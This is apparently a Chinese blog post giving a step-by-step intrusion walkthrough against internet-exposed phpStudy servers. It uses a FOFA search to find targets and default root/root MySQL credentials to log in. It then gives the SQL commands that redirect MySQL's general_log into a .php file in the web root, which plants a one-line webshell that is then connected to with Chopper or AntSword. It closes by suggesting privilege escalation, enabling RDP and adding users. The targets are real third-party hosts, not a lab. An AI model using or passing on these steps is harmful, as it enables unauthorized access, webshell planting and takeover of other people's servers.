一个弱口令拿下shell(实战)

本文介绍如何通过PHPStudy探针进行信息收集、利用弱口令登录MySQL,并演示了如何通过SQL指令操作日志记录,最终实现对目标系统的进一步攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前期准备
1.首先信息收集一波确认目标,:fofa: body=“phpstudy探针” && title=“phpStudy 探针 2014”
在这里插入图片描述
2.找几个心仪的目标下手,打开的页面是这样的:
在这里插入图片描述
正文
1.记住这个绝对路径,后面用得上,然后页面拉到最后,使用弱口令对MySQL数据库连接进行检测。一般phpstudy默认配置的mysql账号密码为root/root,直接使用这个去尝试登录:
在这里插入图片描述
2.但是这种命中率五五开吧,这个不行,就换一个吧,毕竟这个测试,开头还是需要弱口令进去,或者自己也可以跑字典做其他的尝试,显示这样“连接到MySql数据库正常”就是可以的:
访问:http://xxx.xxx.xxx.xxx:88/phpmyadmin
弱口令:root root 登录:
在这里插入图片描述
通过SQL指令来操作
show variables like ‘general_log’; – 查看日志是否开启
set global general_log=on; – 开启日志功能
show variables like ‘general_log_file’; – 看看日志文件保存位置
set global general_log_file=‘tmp/general.lg’; – 设置日志文件保存位置
show variables like ‘log_output’; – 看看日志输出类型 table或file
set global log_output=‘table’; – 设置输出类型为 table
set global log_output=‘file’; – 设置输出类型为file
3.查看日志是否开启:show variables like ‘general_log’; – 查看日志是否开启:
在这里插入图片描述
4.开启日志:set global general_log=on;
在这里插入图片描述
5.查看日志文件保存位置show variables like ‘general_log_file’;
在这里插入图片描述
6.修改日志保存路径文件,注意要准确到文件名:set global general_log_file=’ D:/WWW/aaa.php’; //根据实际情况来定:
在这里插入图片描述
7.更简单一点的方法,在变量处,找到general_log、general_log_file,然后general_log改成ON、general_log_file改为网站根目录下的文件名:
在这里插入图片描述
8.然后通过日志来写一句话:
在这里插入图片描述
9.通过菜刀或者蚁剑连接一句话木马:
在这里插入图片描述
10.之后根据不同服务器状况采取不同选择,例如提权、开启3389、添加用户。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值